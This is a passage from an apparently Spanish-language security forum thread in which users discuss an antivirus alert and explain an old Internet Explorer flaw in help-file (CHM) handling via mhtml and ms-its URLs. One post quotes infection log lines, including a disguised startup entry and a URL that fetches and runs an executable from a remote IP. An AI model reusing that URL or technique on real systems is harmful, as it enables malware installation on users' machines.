SEGURIDAD INFORMATICA, Firewall, parches, vacunas, antivirus, anti troyanos, spyware etc > Seguridad Informatica - Firewall - Virus - Troyanos - Spyware - Ad Aware - Malware

pagina de inicio your-searcher.com/index

<< < (3/3)

Pertusi77:
no es asi todo lo que me salio.. en eso que puse no hay nada que este desubicado ..si a mi tambien me parecio que era mas corto.. de todas formas si sos tan amable de decirme si en eso esta algo fuera de lugar te agradeceria mucho
 gracias

choche:
Lo siento pero yo no controlo esto :( no puedo decirte si esta bien o mal. Fats es el entendido.

enredado:
Curioso lo que pasa con esta página del foro al cargar el post el antivirus (avp 5.0.121) salta lo siguiente:


--- Citar ---
Access to the object X:\..\..\..\cache\nnnnnn.htm is blocked. Object is possibly infected with a virus Exloit.html.mht. It is recommended to quarantine this object.

--- Fin de la cita ---


Supongo que lo hace por esto, ya que la página para justo antes de mostrarlo:


--- Citar ---
O4 - HKCU\..\Run: [cvchost] c:\windows\svchost.exe

O16 - DPF: {10003000-1000-0000-1000-000000000000} - ms-its:mhtml:file://C:\foo.mht!http://81.211.105.37/20609/online.chm::/on-line.exe

--- Fin de la cita ---


Pues eso, es solo una curiosidad. :)

enredado:
No era lo que puse arriba lo que hacía saltar el AV. En realidad no sé lo que es.

Cuando cargo esta segunda página no salta el AV, por lo que no es lo que puse arriba.
Guardé la página en el disco duro con imágenes y no salta al escanearla. :shock:

Enredado ya con el tema, esto más o menos es lo que he visto por ahí:

Supuestamente el exploit se aprovecha de una falla del internet explorer y la forma en que maneja la validación de código en los archivos de ayuda *.chm

Para que iexplorer visualize las ayudas, estas se invocan con protocolos varios: its://, ms-itss://, ms-its://, mhtml:// (entre otros)

El problema consiste en que Internet Explorer no aplica
correctamente la protección de zona que impide la ejecución
de código en páginas ubicadas en páginas remotas. Si se le
pasa a Internet Explorer una URL del tipo mhtml:// que apunta
a un archivo no existente, se puede forzar la ejecución de un
archivo CHM remoto que contiene código hostil y que será
ejecutado como si fuera un archivo local.

Algún virus hay que se aprovecha de la vulneravilidad.

http://www.hispasec.com/unaaldia/1993

Navegación

[0] Índice de Mensajes

[*] Página Anterior

Ir a la versión completa